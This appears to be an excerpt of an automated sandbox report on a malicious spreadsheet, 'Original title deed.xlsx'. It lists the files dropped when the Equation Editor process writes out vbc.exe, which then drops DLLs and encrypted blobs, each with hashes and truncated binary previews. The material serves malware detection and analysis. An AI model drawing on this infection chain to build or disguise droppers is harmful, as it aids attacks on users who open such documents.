                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nshF115.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsm1EE8.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsmB923.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsmCEF3.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsmCF90.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsn2761.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsn86CF.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsn937.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsnBAE9.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsnEF02.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsnEF9F.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsrB9DF.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsrD7BA.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nss53BD.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nss87C.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nssD5D7.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsx542B.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsx8670.tmp
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):561231
                            Entropy (8bit):7.991520357518498
                            Encrypted:true
                            SSDEEP:12288:fa+u+8bZcDEeC+ncFgqfJn/m+aG0F6YRN1Y6ABL4dbHJ811YgwM3sMAQUZZs/Y:f1u+8bWDEev0fJ7aJpN1/d9ChwMrAx2A
                            MD5:9968913B09E0208F6A9CE25397E106A3
                            SHA1:5698E5FD4914D6F2E2DA1A5A3184FAA5F3B8FB86
                            SHA-256:C2F071F42AD0A877F9CC756AAD587BC075ACD74C30A56AB4948E5375D9FFD83F
                            SHA-512:45F61646DEB04C310326473A1AB9C2BB0D5B9BE72B70FC2A25DDE7FD962C46810C24DF7BD40264785CCC23CF328ACA80B2E48CD39F457C4323D72DB8C6B6B841
                            Malicious:false
                            Preview: :.......,...............................T.......:...........................................................................................................................................................................................................................................J...............0...g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsxA0F3.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\nsxD645.tmp\lk95ejdjuy.dll
                            Process:C:\Users\Public\vbc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):5120
                            Entropy (8bit):4.462434595158862
                            Encrypted:false
                            SSDEEP:96:/R3n1ASkfNDZ+tmTYB0jRL/2otsJzaIx:/R20KRL/2LJz
                            MD5:024BBA8A78668315098F21E6E6870F2E
                            SHA1:13CBF881AA36B03D84971C6BE9ED80A65C3B0E12
                            SHA-256:6BB5D8DA50CB0E1BF9CB3C3A9DB6DB6ACF566B3CA974ED8EFD88187E00D920CA
                            SHA-512:EC9400D776A94461B61298DE34F6614EC180AA309542A93F825F9330C7E88EACDB0A6A9A834E35AD24B9E1D882B62AE62AF4B33D25B76F9AC0A19676F8A8A85E
                            Malicious:false
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L......`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text............................... ..`.rdata..".... ......................@..@.data...L....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                            C:\Users\user\AppData\Local\Temp\ue7qbln2lrz74jd4
                            Process:C:\Users\Public\vbc.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7173
                            Entropy (8bit):7.9288168595599275
                            Encrypted:false
                            SSDEEP:192:kpPhVgCWc+OJqhfj0/m3dD5ehohe2PrKTsddDKz:GZaCW0yfj0/sA8rKTeY
                            MD5:C71EE4E61ECF8144240EE54CB9941674
                            SHA1:DFF070E5E55F02F14437397FDDA413879BE28155
                            SHA-256:BA56EDDB23DE5F224C417A2A784195D29BCC858023CC9227B4F4DA200DC0C6DD
                            SHA-512:8FA1106FCBBD009626E7B44A0F78A2816439EEB33D25BADB94566A8A18F4426D2ED7730CDB54F6EE51A9B5901A92F856E5A70BF8FDEC9CFFB6C5B2D402DFDC3C
                            Malicious:false
                            Preview: .....4.B4.1:...!#.k..H../..Q+..[.C..<U......I.*2......i..@..zZ-3...[...38.......7.......A.....I...Qr........_.!.......o//.)+....Q.../1^...].!.;7....[...EI....o23.=?+...yX?.CE......I-SS......q0MM.. ..w=QS~$%'...:_a.34:..Q{o.BCO.6.X..\STT.h.i...`ac.N..._`b.].U...bcc.b.X..copp..m..|}..r...str......Ez{.+......./1.......9^....C...9.......O.........W....."...i.'...l...MM..+/....Sv..51....W"#.=?)...a./.KMq...q-9.CC......A(MM......o-IKp.....w2OQ.#$"...A[W.*+/..}@eiN;<<..Q}..PQS...^...WXZ...m..2Z[[..P..Q_``..]...deg...Z...stz..q../..o..x...stt'H.....1....-...1.....t...?........?......N...}v_S......=,....hJ......N....J...V....L...XD.......l$..... ..r5........=.)..w ...2....%=. ...3...D"#...B...K/0.G.A..\<=...R..j1ST. _..58Z[..+n...{[\..P..H.``...]...."Y=F...`..).3r<U..S.u.....@.E^-)I...t0.o.Js./.....6wv.QZ8?......%.....L...mn....Rs...n...fH..8...p........P.......^@......^....._...p..%...|...............;...m.1..@ !...>..FE'(..:_a.S4:...e...
                            C:\Users\user\Desktop\~$Original title deed.xlsx
                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):1.4377382811115937
                            Encrypted:false
                            SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                            MD5:96114D75E30EBD26B572C1FC83D1D02E
                            SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                            SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                            SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                            Malicious:false
                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            C:\Users\Public\vbc.exe
                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):599035
                            Entropy (8bit):7.977146744978909
                            Encrypted:false
                            SSDEEP:12288:aCkfYIfK//zHuSkSzInubnIs/m3LLaJ4FwYRevuKiDbyT7iC5:aJlK/rHuSzInubIs/ILaJwRUuKPF5
                            MD5:669DD51D521BE84D6F2C45012115FC5F
                            SHA1:DD4CBEE8A337E7E6BB7D5C570DB79D7C0F7A7EDE
                            SHA-256:5B6D4E4E80DD9A93F40ECFC45C2874D0C504ECF3680858BE3ED8E05381CF1188
                            SHA-512:77B918749FD865B999BB9A4956A7150882683C1CDB9AEF72883F72213E097C64BBD95E4FA2DE3B7814A22C392541EE304B0F276C66C775A464539F7900B58172
                            Malicious:true
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG.sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@.......................................@.................................8........................................................................................................................text...<b.......d.................. ..`.rdata..t............h..............@..@.data...X............|..............@....ndata.......P...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                            Static File Info

                            General

                            File type:CDFV2 Encrypted
                            Entropy (8bit):7.995286357977067
                            TrID:
                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                            File name:Original title deed.xlsx
                            File size:1173504
                            MD5:ef302d177adde99f0a6f2e8a6bc9eda1
                            SHA1:ebc1e702f7334f162571ae83a4810fd870766ee3
                            SHA256:caf4f0b64bd425c3e04a28606b54a98b4eed7deb03ca7091ad148fddfbc297a8
                            SHA512:7e0b03c1bf0a70a387e81aae0ba553dfb24f1cb62fa585a2a570dc94d400e867f88daf0ed8ed479cbf2b5522c58fa98fd50abcefaa1189139e994d6015dd7e75
